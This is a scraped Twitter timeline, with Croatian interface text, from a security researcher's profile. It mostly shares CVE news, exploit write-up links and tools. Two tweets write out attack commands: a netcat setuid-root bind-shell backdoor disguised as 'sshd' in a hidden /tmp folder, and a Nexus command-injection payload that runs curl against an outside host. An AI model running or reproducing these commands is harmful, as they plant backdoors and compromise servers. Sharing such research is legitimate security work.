Tweetovi

Blokirali ste korisnika/cu @testanull

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @testanull

  1. proslijedio/la je Tweet
    1. velj

    Attention CTF players (and organizers, CTFd v2.0.0 - v2.2.2 has a serious vulnerability (CVE-2020-7245) in which an attacker could perform account takeover using a leading-trailing on the Registration form. It has been fixed in v2.2.3. Make sure to update!

    Prikaži ovu nit
    Poništi
  2. 31. sij
    Poništi
  3. proslijedio/la je Tweet
    25. sij

    I'm working on a new project for Android reversers called Smali Debugger. It's like gdb but for Smali. It uses smalivm () for execution. Here's a quick video of me stepping through two similar methods.

    Poništi
  4. proslijedio/la je Tweet
    18. sij

    Big list of HTTP static server one-liners :

    Poništi
  5. proslijedio/la je Tweet
    15. sij

    【Weblogic New Unserialization RCE】 CVE-2020-2546 T3 RCE CVE-2020-2551 IIOP RCE 攻击者通过IIOP协议远程访问Weblogic 上的远程接口,默认启用,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。

    Poništi
  6. 6. sij

    Breaking PHP's mt_rand() with 2 values and no bruteforce

    Poništi
  7. proslijedio/la je Tweet
    5. sij

    I have 0 CVEs. I've found many many bugs, but I don't need a CVE to prove anything. If you seemingly think a CVE makes you l337, you need to rethink.

    Poništi
  8. proslijedio/la je Tweet
    1. sij

    RT if you get it, research it if you don't: mkdir /tmp/... cd /tmp/... cp `which nc.traditional` sshd chown root:root sshd chmod u+s sshd ./sshd -l -p 2020 -e /bin/sh

    Poništi
  9. proslijedio/la je Tweet
    29. pro 2019.
    Poništi
  10. proslijedio/la je Tweet

    2019 is 99% complete.

    Poništi
  11. proslijedio/la je Tweet
    27. pro 2019.

    I've implemented a fuzzer for PHP: Fuzzing is a great way to find obscure bugs in parsing libraries...

    Poništi
  12. proslijedio/la je Tweet
    19. pro 2019.

    "whoopsie-daisy", part 3. This one is about PID recycling and how it can lead to a vulnerability if PIDs are accidentally used as authentication tokens.

    Poništi
  13. proslijedio/la je Tweet
    13. pro 2019.

    Just published a PoC exploit for CVE-2019-18935 (), RCE via insecure deserialization affecting Telerik UI. See full write-up below. Thanks to for discovering this issue, and for collaborating on exploit dev.

    Poništi
  14. 16. pro 2019.
    Poništi
  15. 15. pro 2019.
    Poništi
  16. proslijedio/la je Tweet
    12. pro 2019.

    VIDEO UPDATE: All 115 Briefings from 2019 have been uploaded to the Black Hat YouTube channel. All videos available here:

    Poništi
  17. proslijedio/la je Tweet
    13. pro 2019.

    The CVE-2019-18935 is a severe insecure deserialization vulnerability affecting UI. Understand its impact + learn to safely patch your software in this post from : (With thanks to + )

    Poništi
  18. proslijedio/la je Tweet
    11. pro 2019.

    When an attacker dumps NTDS.dit, they have user & computer hashes, including Domain Controller hashes. Create Silver Ticket w/ computer hash & regain full AD control: Mitigation: Force all computers to change pw every 1 day via GPO. More in link above

    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    9. pro 2019.

    CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475) "createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo CVE-2019-15588 CVE-2019-5475

    Poništi
  20. proslijedio/la je Tweet
    8. pro 2019.
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·